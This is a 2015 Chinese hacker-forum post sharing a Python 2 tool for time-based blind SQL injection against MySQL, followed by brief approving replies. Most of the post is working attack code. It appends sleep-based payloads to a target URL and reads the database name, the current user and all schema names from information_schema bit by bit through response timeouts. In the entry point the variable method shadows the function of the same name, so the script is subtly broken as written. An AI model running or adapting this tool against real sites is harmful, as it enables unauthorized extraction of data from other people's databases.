基于时间延迟注入的mysql工具

王珂 · 发表于 2015-9-4 00:55:10

本帖最后由 xiaoye 于 2015-9-30 10:55 编辑

理论链接：
http://open.freebuf.com/inland/574.html
如有不懂，请参考上述链接

一个基本可用的，当前仅支持mysql，可以读取数据库名，当前用户，以及当前库，其他功能还在实现

[Python] 纯文本查看 复制代码

#coding:utf8
#author:i3esn0w



import urllib2
import time
import threading
import urllib
from optparse import OptionParser



result={}
database={}

class data_therad(threading.Thread):
    #----------------------------------------------------------------------
    def __init__(self,url,length,sql):
        """"""
        threading.Thread.__init__(self)
        self.length=length
        self.url=url
        self.sql=sql
    
    #----------------------------------------------------------------------
    def run(self):
        """"""
        data=""
        global result
        for bit in range(1,9):
            try:           
                payload=' and if(mid(lpad(bin(ord(mid(('+self.sql+'),%s,1))),8,0),%s,1)=0,sleep(10),0)'%(str(self.length),str(bit))
                target=self.url+urllib.quote(payload)
                req=urllib2.urlopen(target,timeout=3)
                html=req.read()
                data+=str(1)
            except Exception,e:
                data+=str(0)
                pass
        result[self.length]=chr(int(data,2))
            
        
class db_name(threading.Thread):
    #----------------------------------------------------------------------
    def __init__(self,url,length,db_num):
        """"""
        threading.Thread.__init__(self)
        self.url=url
        self.lenth=length
        self.db_num=db_num
#        print self.lenth
    
    #----------------------------------------------------------------------
    def run(self):
        """"""
        data=""
        global database
        for bit in  range(1,9):
            try:
                payload=' and if(mid(lpad(bin(ord(mid((SELECT SCHEMA_NAME FROM information_schema.schemata limit %s,1),%s,1))),8,0),%s,1)=0,sleep(10),0)'%(self.db_num,self.lenth,bit)
                target=self.url+urllib.quote(payload)
                req=urllib2.urlopen(target,timeout=3)
                html=req.read()
                data+=str(1)
            except Exception,e:
                data+=str(0)
                pass
        database[self.lenth]=chr(int(data,2))
        
        
        
        


def getLenth(url,sql):
    i=0 
    #print "[*]正在获取数据长度"
    while True:
        try:
            payload=' and sleep(if(length(('+sql+'))=%s,10,0))'%str(i)
            target=url+urllib.quote(payload)
            req=urllib2.urlopen(target,timeout=3)
            result=req.read()
            i=i+1
        except Exception,e:
            #print "[*]数据长度："+str(i)
            return i
 
  

    
def get(url,length,method):
    
    global result
    tmp=""
    print "[*]正在获取数据内容"
    threads=[]
    for len1 in range(1,length+1):

        sb=data_therad(url,len1,method)
        sb.setDaemon(True)
        threads.append(sb)
    for thread in threads:
        thread.start()
        thread.join()
    for i in range(1,length+1):
        tmp+=result[i]
    print "[*]数据内容为:"+tmp

    
        
def method(url,meth):
    if meth=="current-db":
        sql="select database()"
        length=getLenth(url, sql)
        get(url, length, sql)
    if meth=="current-user":
        sql="select user()"
        length=getLenth(url, sql)
        get(url, length, sql)
    if meth=="dbs":
        print "[*]正在获取数据库个数"
        num=getdbs_num(url)
        print "[*]数据库个数为:%s"%num
        print "[*]正在获取所有数据库名"
        for number in range(1,num+1):
            sql="SELECT SCHEMA_NAME FROM information_schema.schemata limit %s,1"%number
            length=getLenth(url, sql)
            db=getdbname(url,length,number)
            print "[*]"+db


def getdbname(url,length,number):
    global database
    tmp=""
    #print "[*]正在获取第%s个数据库"%number
    threads=[]
    for len in range(1,length+1):
        sb=db_name(url, len, number)
        sb.setDaemon(True)
        threads.append(sb)
    for thread in threads:
        thread.start()
        thread.join()
    for i in range(1,length+1):
        tmp+=database[i]
    return tmp
    
    
    

    
    

def getdbs_num(url):
    i=0 
    #print "[*]正在获取数据库个数"
    while True:
        try:
            payload=' and sleep(if((SELECT count(*) FROM information_schema.schemata)=%s,10,0))'%str(i)
            target=url+urllib.quote(payload)
            req=urllib2.urlopen(target,timeout=3)
            result=req.read()
            i=i+1
        except Exception,e:
            #print "[*]数据库个数："+str(i)
            return i    
    

        
        
        
        
if __name__=='__main__':
    parser=OptionParser()
    parser.add_option("-t","--target",dest="target_url",default="",help="The target url")
    parser.add_option("-m","--method",dest="method",default="current-user")
    
    (options,args)=parser.parse_args()
    
    url=options.target_url
    method=options.method
    
    start_time=time.time()
    method(url,method)
    end_time=time.time()
    print "[*]总共耗时:%s s"%int((end_time-start_time))

fireworld · 发表于 2015-9-5 21:02:15

支持，看起来不错呢！

xiaoqqf4 · 发表于 2015-9-6 02:11:01

学习学习技术，加油！

云游者 · 发表于 2015-9-6 20:43:02

学习学习技术，加油！

Sty，涛 · 发表于 2015-9-6 21:56:02

感谢楼主的分享~

H.U.C-麦麦 · 发表于 2015-9-7 05:17:32

学习学习技术，加油！

菜鸟小羽 · 发表于 2015-9-8 08:34:41

支持中国红客联盟(ihonker.org)

cl476874045 · 发表于 2015-9-8 23:58:22

感谢楼主的分享~

r00tc4 · 发表于 2015-9-9 03:01:08

还是不错的哦，顶了

08-wh · 发表于 2015-9-9 05:30:24

支持，看起来不错呢！

[Python] 基于时间延迟注入的mysql工具

浏览过的版块

指导单位

旗下站点

联系我们